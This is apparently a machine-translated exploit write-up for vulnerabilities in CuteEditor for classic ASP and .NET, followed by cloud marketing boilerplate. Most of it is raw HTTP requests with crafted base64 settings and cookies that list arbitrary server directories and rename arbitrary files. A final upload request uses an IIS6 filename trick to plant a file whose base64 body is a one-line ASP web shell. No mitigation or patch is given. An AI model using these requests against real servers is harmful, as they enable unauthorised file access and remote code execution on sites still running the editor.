CuteEditor for classic asp Vulnerability
The CuteEditor for classic asp Vulnerability was accidentally discovered. The editor used a small amount and was directly released.
Any directory and file:
GET /aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting=MXwxfDF8MXwxfC98L3wvfC98L3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC50eHQsLmRvYywuZG9jeCwucGRmLC5hdmksLm1wZywubXBlZywubXAzLC53YXYsLnN3ZiwuanBnLC5qcGVnLC5naWYsLnBuZywuaHRtLC54bHMsLmh0bWwsLnJ0Ziwud212LC5hc3AsLmFzYSwuYXNweCwuYXNjeCwuYXNheCwucmFyLC56aXAsLmFzaHgsLmFzbXgsLjd6LC50YXIsLmRsbCwuZXhlLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U%3d&MP=/&Theme=Office2003 HTTP/1.1Host: 192.168.223.250:8889Cookie: CESecurity=MXwxfDF8MXwxfC98L3wvfC98L3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC50eHQsLmRvYywuZG9jeCwucGRmLC5hdmksLm1wZywubXBlZywubXAzLC53YXYsLnN3ZiwuanBnLC5qcGVnLC5naWYsLnBuZywuaHRtLC54bHMsLmh0bWwsLnJ0Ziwud212LC5hc3AsLmFzYSwuYXNweCwuYXNjeCwuYXNheCwucmFyLC56aXAsLmFzaHgsLmFzbXgsLjd6LC50YXIsLmRsbCwuZXhlLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U%3d;
After decoding the setting Parameter base64 in querystring, you can add extension names of other files to be listed. The CESecurity parameter in the cookie must be consistent with the extension name, and all cookies starting with the ASPSESSIONID must be deleted, to prevent Session validation failure.
Rename any file:
GET /aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting=MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U=&MP=/uploads/&Theme=Office2003&loc=&action=renamefile&filename=/1.aspx&newname=/1.aspx.txt HTTP/1.1Host: 192.168.223.250:8889Cookie: CESecurity=MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U%3D; ASPSESSIONIDASSRTAQC=MBLPJBJAGFPDNAAJNFENOELH
Exploitation:
1. Upload a jpg file and rename it.
2. the upload directory does not have the execution permission or in other cases, the column directory searches for information such as backup files, or renamed to download other script analysis
Make a backup of the vulnerability cuteeditor for. net in iis6:
POST /CuteSoft_Client/CuteEditor/uploader.ashx?_Addon=xhttp&_AddonGuid=e7d8104a-0ba6-4b47-8285-59d442e2b7d3&_PartialStart=0&_PartialFileName=1.asp; HTTP/1.1Host: XXXXXXContent-Length: 28 PCVldmFsIHJlcXVlc3QoImEiKSU+
From: http://z-cg.com/
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
